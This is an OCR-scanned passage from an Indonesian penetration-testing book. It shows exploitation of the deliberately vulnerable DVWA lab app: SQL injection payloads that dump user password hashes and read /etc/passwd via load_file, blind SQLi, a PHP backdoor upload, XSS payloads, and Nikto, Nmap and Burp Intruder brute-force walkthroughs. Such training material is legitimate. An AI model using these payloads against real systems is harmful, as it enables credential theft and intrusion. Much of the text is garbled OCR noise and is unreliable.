8uiS49f I 1 



XOi ' onion oil ooloci colu 
rixti noaoi aoor id 

IDs ' union oil aol«ct colu 
::rit nooot f ;rit noao 
ImoMt I 

IDs ' onion oil ooloci colu 
fixat nooot Int noM 

XOi ' union oil ••loci colu 
rixsi noooi caor 
luxooaoi 1 

XDi 1 onion oil ooloci colu 
Flxti noooi password 

ton 



XDi * onion oil ooloci colu 
r.rtt r.iTi, «r*t«r 
fiursia*) 1 



root information 



ro> information 



tea information 



rem information 



rem mterattion 



mformotion 



• ccloamn* vfe«ro 



col-**n» vfeoro 



col jama what a 



. colimna whara 



eol^ama whara 



rooa in format ion tcr.aaa . collar, a vftara 



rom information 



roca information acfc— . eoloaar.a whara 



oblo ochoM-doiobooor 



•bl« achooo-d«iobooo| )* 



oblo oe homo -do i •»•■•( a 



ablo achooo-doioboao( ># 



abla ■chooo-doioboool ># 



ablo tchoao-databooot )# 



ablo achoao-doioboool 



ablo ach*m*-catabaa«| ># 



abla srhaaa-databaaai )• 



Sekarang kita bisa mendapatkan informasi user dan pass- 
wordnya dengan menggunakan database dvwa, tabel users 
dan kolom user dan password 

'union select user.password from dvwa.users# 

Sehingga akan didapatkan data usernama dan passsword dari 
aplikasi dvwa, seperti pada gambar berikut ini: 



Vulnerability: SQL Injection 



User ID: 



SajDmrt 

IDi 'union select uier,panworc from dvvi.uitnl 
First name: admin 

•urntMi Sf4dcc3b5aa7€5dtld8327deb882cf99 

IDi 'union select user , password frost dvwa. users* 
First r.aae: gordonb 

Surname i e99al8c< 28cb38d5f 2€C853478922e03 

XOi 'union select user , password from dvwa. users* 
first nftsen 1337 

Surname i 8d3S33d75ae2c39o€d7eCd«f cc€92 Ub 

IOi 'union select user , password from dvwa. users* 
First name: pablo 

Surname i 0dl07d09f Sbbe4Ccade3deSc7 HMM 

XOt 'union select user r password from dvwa. users* 
First name* smithy 

Surname i Sf 4dcc3bSaa76Sd6 Id8327deb882cf 99 



Dan didapatkan username admin dengan hash password: 
5f4dcc3b5aa765d61d8327deb882cf99 yang setelah di crack 
merupakan md5 hash dari password. 
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Selanjutnya kita dapat mempergunakan fungsi-fungsi lain dari 
mysql yang berguna bagi kita, seperti membaca file dengan 
fungsi load_file() atau menulis ke file dengan fungsi into out- 
file(). 

Dengan fungsi load_file(), memungkinkan kita untuk membaca 
file-file yang dapat dibaca oleh user yang menjalankan web 
aplikasi/web user. Kita dapat membaca file konfigurasi datbase 
dari web server, konfigurasi dari server, dsb. 



o 



DyWA} 




Vulnerability SQL Injection 



UMTID 



6. Blind SQL Injection 

Celah keenam yang terdapat pada DVWA adalah celah Blind 
SQL Injection, perbedaan celah ini dan celah SQL injection ada- 
lah error yang tidak muncul. Sehingga untuk mengeksploitasi- 
nya. Sebagai contoh saat kita masukkan single quote ('). 



n o 


Damn Vulnerable Web App (DVWA) vl 0.7 : Vulnerability: SQL Injection (Blind) 


1 > 1 & 


S 192.168 1 205 


ilnerattlltlt* / vqQI** f?td .X2 7&SuO#ntt ■ Subm t# C 










Vulnerability: SQL Injection (Blind) 


Hmm 








UMr 10: 


















i 




CSHF 

Flic tocJufon 




rviorc inio 


SOL In )•<_<! >or .BUMd , 







Dan tidak terdapat error mysql sama sekali yang tampil. Untuk 
mengetahui apakah situs tersebut memiliki celah sql injection 
atau tidak kita bisa memasukkan perintah sql, sebagai contoh 
menggunakan true or false argument. 

True condition memasukkan ID= 1' OR "='# ; jika hasil yang di- 
proses oleh aplikasi adlaah sama denagn ID=1 berarti ke- 
mungkinan aplikasi memiliki celah SQL Injection (Blind), dan 
diperoleh hasil sebagai berikut: 
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Vulnerability: SQL Injection (Blind) 



User ID: 

2Di I 4 Oft 

riret ram i admla 

Imut i *4»1a 



Dan ternyata memiliki hasil yang sama dengan ID=1 , sekarang 
kita coba False argument, 



Vulnerability: SQL Injection (Blind) 



User ID: 



It 

XOi -t OR 

Pint aami ftdtala 

XOi -I 1 OK 

Pint AiMi Cordon 

j — i I Bronm 

ZDi -I OH 
Pirtl ***** Mac* 
S';rr.u# i K* 

IDi -I * on 

Plrtl A AIM I PAbiO 

f ur n ■ * * i P1caa»o 

ZOi -I Oil 
Plr«t ****t B«b 



Dan proses eksploitasi sql injection pun terjadi, selanjutnya kita 
akan menentukan field yang dapat kita manfaatkan. Cara yang 
akan dipergunakan sama seperti cara kita saat mencari celah 
SQL Injection, perbedaannya adalah apabila jumlah field benar 
maka hasil akan tampil, sebaliknya jika jumlah field salah maka 
tidak akan tampil apa-apa. 



Mari kita coba dengan untuk asumsi 1 column, gunakan 'union 
select 1# 



Vulnerability: SQL Injection 



User ID: 



urior select 1# 



Submit 



Dan tidak ada error yang dihasilkan. 



W 168 1 208 



d\(Wa) 



Vulnerability: SQL Injection (Blind) 



UMrlD: 



Kita lanjutkan dengan 'union select 1,2# 



Vulnerability: SQL Injection (Blind) 



User IO: 



ZOt jp.ion itltct 



Dan kita mendapatkan bahwa terdapat sejumlah 2 column yang 
kedua-duanya bisa kita manfaatkan, karena dalam beberapa 
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kasus terdapat beberapa column, dan bisa jadi tidak semuanya 
bisa dimanfaatkan. 

Dan langkah yang dilakukan sleanjutnya sama, sampai kita 
mendapatkan username dan password dari user aplikasi, 

Vulnerability: SQL Injection (Blind) 



User ID: 



| 1 [ Subwtt 



ID: 'union all select user, password from users* 
First names adain 

Surname: St 4dcc3b5aa765d6 Id8327deb882cf 99 

ID: 'union all select user, password from users! 
First name: gordonb 

Surname: e99al6c428cb38d5f 26085 36 78922e03 

ID: 'union all select user, password from users* 
First name: 1337 

Surnames 8d3533d7 5ae2c396 6d7e0d<f cc69 2 16b 

ID: 'union all select user, password from users* 
First name: pablo 

Surname: 0dl07d09f 5bbe40cace3de5c7 Ie9e9b7 

ID: 'union all select user, password from users* 
First name: smithy 

Surname: 5f 4dcc3b5aa76 5d6 Id8 327deb882cf 99 



atau mendapatkan akses ke sistem mempergunakan fungsi 
load_file() atau into outfile(). 



Vulnerability: SQL Injection (Blind) 



User ID: 

i i ra 

IDi 'union All .elect lo«d_f ile ( /ctc/pa§e*d ' ) , null* 

Firet r.t.Tti root i x i C i C » root i /root j /bin /bain 

dteaon i x 1 1 1 1 iditmom /uar/ebim /bin /eh 

bin t x i 2 t 2 i b i n t /bin i /bin/ ah 

eye :x: 3 : 3 : |M : /dtvt /bin/ah 

syncs x 1 4 : 65 5 34 : aync: /bin: /bin/aync 

gaaee : s: 5 : 60 : geaee : /uar/ge*ee: /bin /ah 

nan : x : 6 s Uimai /var /ceche/;»en : /bin /ah 

ipi x; 7 i 7 j lpj /var/epool/lpd i /bin /ah 

sail ixsti 8 1 mail i /var /mail i /bin /ah 

newa i x i 9 i 9 i neva i /var/epool/neve i /bin/ah 

uucpi x i 10 i 10 i uucpi / var /epool /uucpi /bin/ah 

proxy t xs 13:13 : proxy : /bin: /bin/ah 

vw-data: x: 33 : 33 :ww-data: /var/vww: / bin/ ah 

backup: x: 34: 34:beckup: /vex /backup* : /bin/ah 

lietixsjf s39:Mei:ing Liat Manager : /var / 1 itt ; /bin/ th 

irctxt 39 1 39 1 ircdi /var /run/ircd i /bin/ah 

gnateixi41 i41 iGnate Bug-Report in? Syaten ( adain > i /var /lib/gnata i /bin/ah 

nobody i xi 65S34i65S34 i nobody i /nonexiatent i /bin/ ah 

libuuidixi 100 i 101 i i /var/lib/libuuidt /bin /ah 

ay a log :x:101:103:: /hoae/ayelog : /bin/falae 

aeasagebua :x: 102:104s: /var/run/dbua : /bin/ falsa 

eaaer :x: 1000 s lOOOsAhxcad Xu«mi«r, , , s /hoae/aaaar : /bin/baah 

aahdsx s 103:65534:: / var / run/ e and s /uar/abin/nologin 

enapixs 104 1 11 1 \ i / var /lib/anaipi /bin/f alae 

telnetdixi 105 i 111 I t /nonexiatent i /bin/f alae 

ayeql m 106 1 1 14 iMy&QL Server* , , i /nonexiatent i /bin/false 

Surname: 



7. Upload 



Celah ketujuh yang terdapat pada DVWA adalah celah fungsi 
upload, celah ini biasanya kita temukan dibanyak aplikasi web. 
Celah ini paling mudah di eksploitasi, dan pada level dvwa secu- 
rity low tidak ada filter terhadap file sama sekali, sehingga kita 
dapat mengupload file backdoor .php, dalam hal ini kita gu- 
nakan file yang sama saat kita melakukan eksploitasi remote 
file inclusion, tetapi dengan ekstensi ".php" 

Vulnerability: File Upload 

Choose an image to upload: 
1 Caoote Fitt I shell php 

Upload 



Kemudian dinyatakan bahwa kita berhasil melakukan upload 
file "shell.php" 

Vulnerability: File Upload 

Choose an image to upload: 
ICfcoo—Mt) no Ne selected 

Upload 



. / . . /heckable/uploeds/ehell .php aucceefully uploaded! 



Selanjutnya, kita hanya perlu mencari URI path yang tepat men- 
garah ke file yang kita update, dan dalam hal ini kita tau 
diupload ke folder tersebut, sehingga kita bisa langsung men- 
gakses http://1 92.168.1 .208/hackable/uploads/shell.php seperti 
pada gambar berikut: 



#fc<-+»-OUp»tHHw»1 _ j| 




Atau anda bisa membuat php based "reverse/bind shell" back- 
door dengan metasploit :). 
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8. Cross Site Scripting (XSS) Reflected 



Celah kedelapan adalah celah cross site scripting reflected, ce- 
lah ini mengijinkan kita memasukan perintah html, javascript. 
Sebagai contoh kita mempergunakan tag html <h1>, seperti 
contoh berikut: 

Exploit/XSS payload : <h1>XSS</h1> 
Vulnerability: Reflected Cross Site Scripting (XSS) 

What's your name? 

MKM 
XSS 



Tetapi pada beberapa situs, umumnya forum diskusi beberapa 
tag HTML memang diijinkan, dan untuk meyakinkan kita gu- 
nakan tag yang umumnya di filter yaitu <iframe>, <script> dan 
berikut ini kita coba memasukkan iframe dengan XXS payload 
sebagai berikut: 

<IFRAME+SRC= http://1 92.1 68.1 .208 x%2FIFRAME> 



Maka kita akan mendapatkan hasil sebagai berikut: 



Vulnerability: Reflected Cross Site Scripting (XSS) 



What's your name? 



Submit 



Hello 





I I II * 






Instruction* Cj '' 1 




are 




tea 




Brute Force V\ 





Dan umumnya celah XSS Reflected ini dimanfaatkan oleh at- 
tacker untuk melakukan kegiatan phishing dan social engineer- 
ing, karena serangan ini hanya berlaku client-side dan reflected 
sehingga hanya target yang menerima link dengan payload xss 
yang akan terkeksploitasi. 

Untuk eksploitasi XSS yang lebih berbahaya dapat merujuk ke 
bab 1 bagian Attack Vector Cross Site Scripting (XSS). 

9. Cross Site Scripting (XSS) Persistent 

Celah kesembilan dan terakhir dari aplikasi DVWA adalah celah 
cross site scripting persistent, celah ini seperti celah XSS re- 
flected mengijinkan kita memasukan perintah html, javascript 
ke aplikasi, dan bedanya adalah xss payload yang kita masuk- 
kan akan tersimpan, sehingga seluruh user yang mengakses 
situs atau URL akan mungkin tereksploitasi. 
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Sebagai contoh kita mempergunakan tag html <h1>, seperti 
contoh berikut pada halaman yang memiliki celah XSS persis- 
tent 

Exploit/XSS payload : <h1>XSS</h1> 
Vulnerability: Stored Cross Site Scripting (XSS) 



4l1>XSS41> 











XSS payload tersebut akan tersimpan dan di proses oleh 
aplikasi setiap kali diakses user. 



- c 



192 16« 1.208 




Vulnerability: Stored Cross Site Scripting (XSS) 



Cor 



r,i. i ■ .-i 

SQL toftolfron 

ML tajMllon (Blind) 



TNt ft a tot! comma** 



DVWA ttcuiBy 

Info 
About 



More info 



Celah XSS reflected dan persistent ini tidak memiliki impact 
sama sekali ke server. Celah ini akan menjadi sangat berba- 
haya ke user apabila dikombinasikan dengan celah pada 
aplikasi client seperti web browser, mail client dsb yang dapat 
memproses XSS payload (tag html/javascript) secara otomatis. 

Untuk eksploitasi XSS yang lebih berbahaya dapat merujuk ke 
bab 1 bagian Attack Vector Cross Site Scripting (XSS). 
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Web 




Pada BAB ini akan dibahas 
mengenai beberapa 
perangkat yang dapat 
dipergunakan untuk 
membantu dan juga sudah 
umum di pergunakan 
dalam proses Web 
Application Hacking. 



Ahmad Muammar, OSCP (C) 2013 



Section 1 



Web Application 
Security Tools 

Daftar Isi 

1. Nikto 

2. NmapNSE 

3. BurpSuite (next) 

4. SQLMap(next) 



1. Nikto 



Nikto adalah aplikasi opensource web server scanner, yang 
bekerja dengan cara membandingkan web server dengan ban- 
yak item di database, termasuk diantaranya adalah 6500 file/cgi 
yang memiliki kemungkinan celah keamanan, lebih dari 1250 
versi server yang sudah out-of-date, dan sebanyak 270 masa- 
lah spesifik berdasarkan versi dari suatu webserver. 

Nikto juga memeriksa file konfigurasi, seperti keberadaan multi- 
ple index files, opsi pada server HTTP, dan juga akan men- 
gidentifikasi versi web server dan aplikasi yang terinstall. Nikto 
dibuat dan bekerja tidak secara tersembunyi, sehingga akan 
mudah terdeteksi oleh perangkat keamanan jaringan (di log), 
meskipun begitu, nikto dilengkapi dengan metode anti-IDS. 

Untuk menggunakan nikto, anda perlu menginstall Perl dan li- 
brary perl yang dibutuhkan, karena nikto menggunakan perl se- 
bagai bahasa pemrograman. Nikto sendiri dapat di download 
gratis dari situsnya di http://cirt.net/nikto2. 

Untuk mengakses mengenai informasi lengkap penggunaan- 
nya, dapat diakses dengan #perl nikto.pl -H 
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Sebagai contoh berikut ini adalah saat kita melakukan proses 
scanning web server dengan alamat ip 192.168.1.210 




Beberapa informasi yang bisa diperoleh dari hasil scanning kita 
adalah diantaranya : 

1 . Versi webserver yang outdated 

2. Versi PHP yang outdated 

3. HTTP Method yang aktif: GET, HEAD, POST, TRACE dan 
method TRACE memiliki celah keamanan. 

4. Terdapat aplikasi phpmyadmin yang terletak di 
http://1 92. 1 68. 1 .21 0/phpmvadmin/ " 

5. Terdapat directory /icons/ dan default file README. 



Seperti sudah di singgung diatas, nikto bekerja dengan mem- 
bandingkan hasil scanning dengan database-nya, sehingga 
proses scanning akan berlangsung cepat, tetapi hal ini juga 
menjadi kelemahannya, karena beberapa direktori yang tidak 
terdapat pada dictionary/database-nya tidak akan dideteksi. 

Untuk mempergunakan nikto terhadap aplikasi/direktori yang 
tidak standar maka kita bisa menggunakan link full-path ke di- 
rektori tersebut, sebagai contoh ke aplikasi milik omega-bank, 
yang berada di http://1 92.1 68.1 .21 0/omega-bank/ 
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Etl I© 192.168.1.210/omega-bank/ 



BANK 

lor OMCCt A 



6 O 

• Internet Banking Login 



Internet BanJting | SwtOM | Product | Nnvi | About Ue | Search | GuMtaoofc 



Internet Barring Login 
User nam* 



Password 



* ATM l 



Calm. Bright. Generous. Secure. 

We invfcc you to join us in the sprit of giving by helping those in need this 
season. Donating to Iocs! ch areas nas been our tradition for over 100 
years, and this year its espeoaeV important for ai of us to remember to 
give generous*/ when possfcle 

ink of Omega* 



OMEGA 
Tompora ry 
Liquidity 
Guarantee 

Program (TLGP). 
• Learn More 

Protect Your 
identity. Call The 
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gunakan perintah #perl nikto.pl -h 

http://1 92. 1 68. 1 .21 0/omeqa-bank/ dan akan didapatkan hasil 
sebagai berikut: 



in IM 1 ;ia 

in im i.m 



1M*. aaaaja-toaWaafc-irt'laaj »o ««v?ictiin*inMrtkiMr«Mt«t<titlpunMtf*l»it l*Muc tion aay alia* inr Mat • iccitf ta ♦> M lui-tja 

Jt . «*•«• Dwii' a«a#rwcant«i i*aa>«.ca» tau t&aai ». Mart : Taajcat aay ta ta*rt««ra4 «• Ut attaifcara raaa arbitrary mim ftaatrtct as<« 

<aa« . ■■•«« ajMaW/igajf tafMlii IfJtf i««r« »» r iHm .,»«^ 4«u»t« i'.mKm aaa.* 

tnM •*•«■«• Nri ■ -<«•«■ ■ f**r«eieM»ir:*« *r«? nan *\*».*rmaarta»e» • a»*w»»taU| hmihm >«*«ra)*M** «-»• nNlftfl KTT 

IMS -a«jaWaafeir.'*jatatoaaa.' **f«rv» *ab tit f«r«i ara ▼ 5 1a valtaraata ta C'tn 5^»i Scr*a>tinf iMaon Dvf «uU lagi*.'»a 



naitHahai a*oa*a t>, ar«a«adiaf a» aatr* ' /' . Mta://p 



dan kita mendapatkan hasil yang lebih banyak lagi dan bisa kita 
cobakan, tetapi yang perlu diingat adalah bahwa penggunaan 
tools untuk melakukan scanning akan memunculkan kemungki- 
nan adanya celah keamanan yang false positive. 

Kustomisasi Nikto 

Selain beberapa hal diatas, nikto juga dapat dikustomisasi un- 
tuk dapat bekerja secara maksimal, dalam hal ini melakukan 
scanning aplikasi yang mempergunakan cookie, seperti pada 



aplikasi dvwa, untuk dapat mengeksploitasi celah-celah yang 
ada kita harus melakukan login atau memiliki cookie untuk da- 
pat berinteraksi dengan aplikasi. 

Sebagai contoh adalah scanning langsung webserver dengan 
alamat ip 192.168.1.207 



WM lilMi '<««•. «ta > .>**M»«:>^X»: I I4> •>•> 4C?«MCt«M» »># i tm ll »X»t1»lty iw"* <»»»» 



««■ in •«* tap *r«» «n vwnxs 1c«n 



Kita dapat melakukan setting cookie pada file nikto. conf, untuk 
mendapatkan cookie kita bisa mempergunakan nikto dengan 
opsi menambahkan "-Display 2", untuk mendapatkan cookies 
dan proses scanning dilakukan dengan mempergunkan cookies 
dan perhatikan perbedaannya sebagai berikut: 

#perl nikto.pl 192.168.1.207 -Display 2 
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Dan kita dapatkan hasil yang lebih banyak dibandingkan tidak 
mempergunakan cookies. 

Atau kita dapat mempergunakan fitur inspect-element yang Su- 
dan terdapat di browser dan melihat cookit yang dipergunakan 
seperti berikut ini: 




Selanjutnya kita bisa set cookie tersebut, sehingga akan selalu 
di gunakan jika kita akan melakukan scanning terhadap web 
server dengan alamat tersebut, tetapi yang perlu di ingat, hal ini 
akan berlaku static, dan secara manual juga kita harus 
menghapusnya. 
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Tambahkan konfigurasi terkait cookies yang kita dapatkan ke 
file nikto.conf kedalam variable static-cookie seeperti pada gam- 
bar berikut ini: 



53 

54 * CO*k1e : COOkie n ,1 rrj.r t 

55 i Multiple, c» n ae s et by sep aratln f wl tn a s eal -colon, t.f.: 

56 « cookie: * cookfl valu** ; '■HH?***HHal *tt* 

57 STATlC-COOKII**secuM ty---htcrT; •PHPSeSSlD-«-v*br45?rkklra*pptb©8*kcc93* 
56 

59 * The below allows you to vary which HTTP methods are used to check whether an HTTF(s) server 
66 * is running. Soae web z^rvtrz. such as the autopsy web server do not lapleaent the MEAD aethod 
61 CMECW«TMODS-MEAD GET 



Selanjutnya setelah disimpan kita bisa melakukan scanning 
kembali dengan cookie yang sudah ada. 
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2. Nmap NSE 



Nmap dengan dukungan NMAP scripting engine memberikan 
beberapa NSE yang berfungsi untuk melakukan vulnerability 
scanning terhadap webserver. Untuk nama dan letak NSE da- 
pat di lihat di /usr/local/share/nmap/scripts/ 



se 



Salah satu yang umum di pergunakan dan cukup bermanfaat 
adalah NSE http-enum yang akan secara cepat melakukan pe- 



meriksaan kemungkinan direktori yang tersedia seperti gambar 
berikut ini. 



bash-3-2# naap • • script* httpenua -p88 192.168.1.26? 

Starting Naap 6 25 ( http://nMp.orf ) at 2813-6114 19:48 V1T 

Naap scan report tor 192 , 168 , 1 ■ 267 

Host is up (8 889s latency). 

PORT STATE SERVICE 

88/tcp open http 

| http-enim: 

| /logm.php: Possible adam folder ^^^^ 

| /login/ Login pace 

| /robots txt: Robots file 

| /mfo.php: Possible information file 

| /setup/passvord_required.htal: 2V1RE GATE v A i 

| /phpayad«>n/ : phphyAdaln 

| /README: Interesting, a readae. 

j /config/: Potentially Interesting directory */ listing on 'apache/ 2. 2. 28 (ubontu)' 
| /docs/. Potentially Interesting directory v/ listing on 'apache/2 . 2 . 28 (ubuntu)' 
| /external/: Potentially interesting directory */ listing on 'apache/ 2 . 2 . 28 (ubuntu) 
| /Icons/: Potentially interesting folder «/ directory listing 
j /Info/: Potentially interesting folder 
| /setup/: Potentially interesting folder 
HAC Address: 28 CF DA 88 :81 :B1 (Apple) 

Naap done: 1 IP address (1 host up) scanned in 3.52 seconds 
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Pada BAB ini akan dibahas 
mengenai perangkat Burp 
Suite yaitu salah satu 
perangkat untuk 
melakukan web penetration 
testing. 



Ahmad Muammar, OSCP (C) 2013 



Section 1 



Burp Suite 



Daftar Isi 

1. Burp Suite 

1.1 Proxy 

1.2 Spider 

1.3 Intruder 

1 .4 Repeater 

1 .5 Sequencer 

1 .6 Decoder 

1.7 Comparer 

1.8 Scanner 

1 .9 Extender 



1. Burp Suite 



Burp Suite adalah salah satu perangkat keamanan gratis yang 
sangat berguna dalam melakukan kegiatan web application se- 
curity atau untuk kegiatan penetration testing. Burp yang pada 
awalnya hanya merupakan aplikasi proxy server untuk melaku- 
kan intercept baik terhadap http-request ataupun http-response 
ke server dan web aplikasi. 

Sampai versi terakhir 1 .5 yang dapat diunduh di 
http ://portswiqqe r. net/bu rp/down load . htm I , burp yang dina- 
makan suite juga berisikan tools-tools lain yang bermanfaat un- 
tuk kegiatan Web application security dan penetration testing. 

Burp Suite yang dikembangkan dnegan bahasa pemrograman 
JAVA ini memiliki tools seperti proxy, spider, intruder, repeater, 
sequencer, decoder, comparer untuk versi gratisnya. Serta Per- 
angkat untuk melakukan scanning vulnerabilities terhadap web 
aplikasi dengan perangkat scanner pada versi Professionalnya. 

Dan berikut akan kita bahas secara singkat perangkat- 
perangkat yang terdapat pada Burp Suite, tetapi sebelum itu 
berikut adalah beberapa hal yang perlu dikonfigurasikan pada 
Burp Suite dan pada browser agar berjalan sempurna. 
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Gambar Aplikasi Burp Suite versi gratis 



Untuk memastikan Burp Suite bekerja, pastikan bahwa proxy 
listeners dari burp berjalan sempurna maka periksa pada Tab 
Proxy dan tab Options, perhatikan pada bagian proxy-listeners 
untuk di-cek dan running, begitu pula bagian Intercept Client Re- 
quest, dan pada beberapa kasus jika diperlukan juga melaku- 
kan intercept Server Responses. 



Secara default maka proxy listener akan berjalan di 
127.0.0.1 :8080, dan alamat ini yang perlu kita set pada browser 
yang akan kita pergunakan pada aktifitas web penetration test- 
ing nantinya. 




Gambar Tab konfigurasi Proxy 



Kemudian kita perlu untuk mengkonfigurasikan browser yang 
akan kita pergunakan, dan untuke mempermudah dalam mela- 
kukan switch proxy, apabila kita menggunakan lebih dari 1 
proxy nantinya, maka untuk browser firefox atau chrome ada 
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add-os/extensions FoxyProxy yang dapat dipergunakan. Dan 
berikut ini adalah gambar untuk mengkonfigurasikan Burp 
proxy yang akan kita pergunakan nantinya. 




Gambar Aplikasi Konfigurasi FoxyProxy 



Sehingga, untuk mempergunakannya kita tinggal memilih kon- 
figruasi untuk Burp proxy pada icon foxyproxy di firefox, seperti 
pada gambar berikut ini: 



Gambar Memilih Burp sebagai Proxy 

Dan selanjutnya apabila kita mengakses suatu web maka akan di inter- 
cept oleh burp, dan kita dapat memodifikasinya sebelum meneruskan 
request tersebut ke web server dengan meng-c//'c/ctombol Forward, 
seperti gambar berikut ini, 
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Gambar saat kita mengakses web DVWAdan langsung di intercept burp 
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Gambar setelah kita meneruskan request dengan meng-c//'c/c Forward button 



1.1 Proxy 



Perangkat utama dari Burp suite yang awalnya dikenal dengan 
Burp Proxy adalah aplikasi proxy server yang dapat kita konfigu- 
rasikan untuk melakukan /ntercepf terhadap seluruh transaksi 
web. Seperti pada penjelasan sebelumnya maka kali ini kita 
akan mempergunakan aplikasi web DVWA (Damn Vulnerable 
Web Application) sebagai aplikasi yang akan kita test. 

Sebagaimana kita ketahui bahwa aplikasi DVWA memiliki be- 
berapa level yaitu low, medium dan high dan untuk merubah 
level tersebut kita harus login terlebih dahulu kemudian mengak- 
ses halaman security.php, jika tidak maka secara default level 
security dari aplikasi adalah "high". 

Dengan memanfaatkan penggunaan burp maka kita akan mela- 
kukan modifikasi security level dari aplikasi yang ternyata di set 
lewat Cookie oleh aplikasi, sehingga security level milik kita 
akan langsung ter-set dengan level low. Adapun yang kita laku- 
kan adalah dengan melakukan intercept seperti gambar diba- 
wah ini 
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Gambar Request ke web dvwa, dan terlihat aplikasi men-set level security ke high 



Sebelum kita mem-Forward request tersebut, maka kita dapat 
memodifikasi security level dari aplikasi, sehingga saat kita 
login level security kita adalah low, seperti gambar berikut 
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Gambar Memodifikasi Cookie 



Dan seterusnya setiap request, kita harus memodifikasi sting 
security menjadi low pada tiap request, sehingga saat kita login 
ke web aplikasi, level security yang kita punyai adalah low, 
seperti gambar berikut 
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Gambar saat login, sudah otomatis dengan security level: low 



1.2 Spider 



Perangkat kedua dari Burp Suite adalah "Spider", perangkat ini 
berfungsi sebagai crawler yang akan secara aktif dan pasif me- 
lakukan crawling terhadap web aplikasi untuk mendapatkan 
data halaman web, direktori, bahkan melakukan submit form 
dan mendapatkan variabel. 

Spider dapat di konfigurasikan untuk mempergunakan scope 
yang terdefinisi terlebih dahulu, dengan tujuan fokus terhadap 
target, untuk menentukan scope, perlu didefinisikan pada Tab 
Taget seperti pad agambar berikut: 




S a 



Gambar Scope yang didefinisikan 
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Untuk mulai melakukan kegiatan crawling web aplikasi, maka 
lakukan klik-kanan dan pilih opsi "Spider this host" seperti pada 
gambar dibawah ini: 




-JUj»t*: Meclllt/4.0 iMaclafccah; tafcol Mac C« I 10. f; rv:17.0» 
I* I ria»*foa/l?.0 

Jhtetytr t hftAl, apyl it** aort»M*J ♦ . ap?) ire* if>*V «W ji-C. »,•/•; 
Accept 4MflJBft0N •fc-US.aa.;^.* 
JUrr«ft IwrollR^i flip. Aaflata 

:#r 1 

Fx ocy -Connect Ian: L»«p-slt-ma 



Gambar melakukan Spider terhadap URLtertentu. 



Dan kemudian akan terlihat bahwa spider berjalan, seiring berjalanya aktifitas crawl- 
ing, maka nantinya pada Target akan bertambah pula direktori dan file yang terdapat 
pada list URLtersebut. 



1.3 Intruder 



Perangkat yang ketiga dari kumpulan Suite pada Burp adalah 
Intruder. Intruder ini adalah perangkat yang yang bermanfaat 
untuk melakukan otomatisasi kegiatan yang ditemukan pada 
saat melakukan kegiatan penetration testing. Salah satu kegi- 
atan yang dapat dilakukan dengan memanfaatkan intruder ada- 
lah untuk melakukan HTTP based brute-forcing 



o 



Burp Intruder Repeater Wndow Help 



| Target Proxy Spider ] Scanner [ Intruder ] Repeater j Sequencer ] Decoder ] Comparer ] Option* 



Target Positions ] Payioads 



Option* 



l?j Attack Target 

Configure the details of the target for the attack. 

Host 127.0.0.1 
Port 



(J Use HTTPS 



Gambar Tab Intruder 



Selanjutnya kita akan coba melakukan bruteforce terhadap web 
login pada aplikasi DVWA. Salah satu kelebihan dari aplikasi 
bruteforce ini adalah kita tidak perlu mengkonfigurasikan be- 
berapa hal yang umumnya kita konfigurasikan pada aplikasi bru- 
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teforce lainnya, semisal thc-hydra yaitu HTTP Method yang 
dipergunakan, kemudian error response dsb-nya. 



Yang perlu kita lakukan adalah mendapatkan 1 request lengkap 
saat proses login terjadi, sebagai contoh mempergunakan user- 
name dan password sembarang, kemudian melakukan inter- 
cept pada proses tersebut seperti gambar berikut ini: 
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Gambar request login ke aplikasi DVWA 



Kemudian mengirimkannya ke Intruder, dengan melakukan klik 
kanan pada seluruh request tersebut, seperti gambar berikut 
ini: 
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Gambar pengiriman request login untuk bruteforce ke Intruder 

Selanjutnya adalah mengkonfigurasikan intruder untuk melaku- 
kan bruteforce terhadap halaman login tersebut memanfaatkan 
full request yang sudah kita tandai. Sebelum itu pastikan host 
dan port serta protokol yang dipergunakan sudah benar (den- 
gan SSL (https) atau tidak), seperti pada gambar berikut ini. 
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Gambar pengiriman request login untuk bruteforce ke Intruder 

Kemudian, kita akan mulai mengkonfigurasikan Intruder untuk 
proses bruteforce. Hal selanjutnya yang harus kita lakukan ada- 
lah menandai payload, payload inilah nantinya yang akan dimo- 
difikasi oleh intruder saat melakukan request. 

Terdapat beberapa tipe attack yang didukung oleh intruder dan 
hal ini sangat terkait dengan payload yang akan kita tandai dan 
diberi posisi, seperti pada gambar berikut ini: 




-j* 




Gambar Posisi Payload dari full request yang kita kirim ke intruder 

Terdapat 5 Payload dengan 5 posisi pada request asli yang kita 
kirimkan, selanjutnya untuk menandai payload yang mana saja 
serta posisinya untuk kita bruteforce, maka yang perlu kita laku- 
kan pertama adalah menghilangkan seluruh tanda lalu kemu- 
dian menandainya, hal ini dapat dilakukan dengan menggu- 
nakan clear button. 

Sehingga, seluruh payload belum tertandai seperti pada gam- 
bar berikut, 
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Gambar Setelah kita melakukan clear payload positions 

Selanjutnya, karena kita hanya ingin melakukan bruteforce ter- 
hadap username dan password, maka kita hanya perlu menan- 
dai payload 1 yaitu username yang dalam hal ini admin dan 
payload 2 yaitu palsu sebagai password. Hal ini dapat kita laku- 
kan dengan mempergunakan Add button seperti pada gambar 
berikut ini: 
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Gambar menandai payload dan posisinya 



Selanjutnya adalah menentukan tipe attack untuk payload, di- 
mana yang tersedia adalah sniper, battering ram, pitchfork dan 
clusterbomb, ada baiknya membaca help untuk tiap-tiap attack 
type payload positions sesuai dengan kebutuhan anda, tetapi 
secara sederhana sniper dan battering ram hanya mendukung 
single set payload dan sudah pasti tidak dapat kita pergunakan 
karena payload yang kita butuhkan lebih dari satu payload. 

Hanya tersisa tipe attack pitchfork dan ClusterBomb, dan tipe 
attack yang terakhir memungkinkan seluruh kombinasi dari pay- 
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load di ujicobakan, sehingga kita akan memilih clusterbomb se- 
bagai tipe attack untuk payload positions seperti pada gambar 
berikut, 




Selanjutnya yang perlu kita lakukan adalah mengkonfigurasikan 
payload, yang sampai proses ini kita membutuhkan 2 buah pay- 
load, yaitu payload 1 untuk username dan payload 2 untuk 
password. 

Dan untuk tipe payload, kita bisa memilih simple list dan me- 
masukkan secara manual list tersebut satu-persatu dikare- 
nakan hanya versi pro yang mengijinkan untuk kita melakukan 
penambahan dari list yang sudah ada seperti file kamus kata. 
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Gambar mengkonfigurasikan simple list sebagai payload 2 

Seperti pada gambar diatas, kita mengkonfigurasikan payload 
dengan posisi nomer 2 yang nantinya akan menjadi password 
pada proses bruteforce dengan intruder ini. Perlu diketahui 
bahwa pada versi free maka proses bruteforce akan memakan 
waktu lebih lama karena hanya bisa menggunakan 1 threads :). 
Anda juga selanjutnya dapat mengkonfigurasikan proses brute- 
